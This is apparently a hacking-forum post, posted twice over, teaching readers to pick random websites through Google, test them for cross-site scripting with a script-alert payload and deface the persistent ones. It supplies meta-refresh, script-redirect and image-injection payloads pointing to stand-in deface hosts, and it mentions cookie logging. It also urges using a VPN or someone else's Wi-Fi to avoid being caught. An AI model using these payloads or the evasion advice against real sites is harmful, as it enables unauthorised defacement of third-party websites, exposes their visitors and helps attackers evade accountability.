How Find A Xss Vurnerable Site And Deface It. 12-09-2012, 08:15 AM
#1
Hello, Thanks for reading my tutorial and please leave feedback!
So today I will show you how to find a xss vulnerable site and deface it.
First the basics "How to find a vulnerable site"
1. Just go to google and type in some thing random. "Cheese, shopping"
2. When you find a random site you want to deface you type this in with out the quotes "<script>alert("XSS");</script>" You can type anything in where the xss is.
3. Find a search bar or anything you can insert text in and type the script.
4. If your lucky a box should pop up like this.![[Image: CWGRZ.png]](http://i.imgur.com/CWGRZ.png)
5. Now the hard part, to tell if it is non persistent or persistent.
6. You want to copy the url after you put in the script and press enter.
7. If it still has the box then its persistent which means you can deface!
8. If it takes you to this
then its non persistent which means no deface only cookie logger.
9. When you find that persistent website here is how you are going to deface it there are multiple different ways you can deface.
10. You can redirect to your deface page, you can make a picture pop up, or replace the page with the picture you want.
11. USE A VPN NOW OR SQUAT AT SOMEONES WIFI OR YOU WILL GET CAUGHT.
12. If you want to redirect you put this in with out the quotes "<meta http-equiv="refresh" content="0;url=http://www.youhacx0rpic.com/Haxored.html" />"
13. If you want to make a picture pop up use this with out the quotes ""><script>location="www.removed.com/YOURDEFACEPIC";</script>"
14. If you want to replace the picture on a site you use this with out the quotes "<img src="yourevilpic.com">"
15. Now you have successfully defaced a website or close to it.
________________________________________________________________________
Useful links----
Xss Tutorial: http://www.mediafire.com/view/?4hn20a1oye8zm0m
Deface page creator: http://www.mediafire.com/download.php?kr1hp0b34tztt8k
Xss cheat sheet: https://www.owasp.org/index.php/XSS_Filt...heat_Sheet
________________________________________________________________________
Thanks for reading!
Sincerely Workaholics.
So today I will show you how to find a xss vulnerable site and deface it.
First the basics "How to find a vulnerable site"
1. Just go to google and type in some thing random. "Cheese, shopping"
2. When you find a random site you want to deface you type this in with out the quotes "<script>alert("XSS");</script>" You can type anything in where the xss is.
3. Find a search bar or anything you can insert text in and type the script.
4. If your lucky a box should pop up like this.
![[Image: CWGRZ.png]](http://i.imgur.com/CWGRZ.png)
5. Now the hard part, to tell if it is non persistent or persistent.
6. You want to copy the url after you put in the script and press enter.
7. If it still has the box then its persistent which means you can deface!
8. If it takes you to this
![[Image: wPTu7.png]](http://i.imgur.com/wPTu7.png)
9. When you find that persistent website here is how you are going to deface it there are multiple different ways you can deface.
10. You can redirect to your deface page, you can make a picture pop up, or replace the page with the picture you want.
11. USE A VPN NOW OR SQUAT AT SOMEONES WIFI OR YOU WILL GET CAUGHT.
12. If you want to redirect you put this in with out the quotes "<meta http-equiv="refresh" content="0;url=http://www.youhacx0rpic.com/Haxored.html" />"
13. If you want to make a picture pop up use this with out the quotes ""><script>location="www.removed.com/YOURDEFACEPIC";</script>"
14. If you want to replace the picture on a site you use this with out the quotes "<img src="yourevilpic.com">"
15. Now you have successfully defaced a website or close to it.
________________________________________________________________________
Useful links----
Xss Tutorial: http://www.mediafire.com/view/?4hn20a1oye8zm0m
Deface page creator: http://www.mediafire.com/download.php?kr1hp0b34tztt8k
Xss cheat sheet: https://www.owasp.org/index.php/XSS_Filt...heat_Sheet
________________________________________________________________________
Thanks for reading!
Sincerely Workaholics.
Grazie ora levati dal cazzo.